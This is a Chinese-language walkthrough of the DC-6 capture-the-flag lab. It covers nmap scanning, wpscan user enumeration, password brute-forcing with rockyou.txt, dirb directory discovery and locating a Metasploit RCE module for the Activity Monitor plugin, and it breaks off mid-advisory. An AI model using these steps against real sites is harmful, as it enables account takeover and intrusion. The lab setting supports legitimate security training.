原标题:DC-6靶机渗透测试详细教程
DC-6教程
描述
DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
这不是一个过于困难的挑战,所以应该非常适合初学者。
此挑战的最终目标是获得 root 权限并读取唯一的标志。
必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。
使用工具
攻击者:kali 192.168.110.4
靶机:DC-6 192.168.1.191
一、信息收集
0x01 查看存活主机和端口
由于主机和靶机不在同一个网段,这里我们直接使用nmap扫描ip地址和端口
nmap -PS 192.168.1.0/24
0x02 查看端口开放的服务
nmap -sV -T4 -O -p 80,22 192.168.1.191
0x03 查看主机指纹信息
whatweb http://192.168.1.191
0x04 访问靶机HTTP服务
发现浏览器找不到此网站(dns无法解析此ip)
添加“192.168.1.191 wordy”到host文件中(“C:\Windows\System32\drivers\etc\hosts”)
同样在kali的/etc/hosts文件下也加上此语句
vim /etc/hosts
在网站内随便点一下
发现这个地方点进去后有登录选项
二、漏洞发现
0x01 用户名枚举
wpscan –url http://wordy/ -e u
0x02 暴力破解用户名口令
将刚刚枚举到的用户名存储在桌面上的文本文档中
vim users.txt
暴力破解
wpscan –url http://wordy/ -U users.txt -P /usr/share/wordlists/rockyou.txt
使用dirb扫描出来管理员登录界面
dirb http://wordy/
打开登录界面输入账号密码登录
发现activity monitor插件
0x03 漏洞信息查询
尝试搜索此插件的漏洞信息
msfconsole
search activity monitor
查找到一个漏洞,查看使用手册
use exploit/unix/webapp/wp_plainview_activity_monitor_rce
show options
01 背景介绍 WordPress 插件Plainview Activity Monitor存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。
02 影响范围
Plainview Activity Monitor plugin version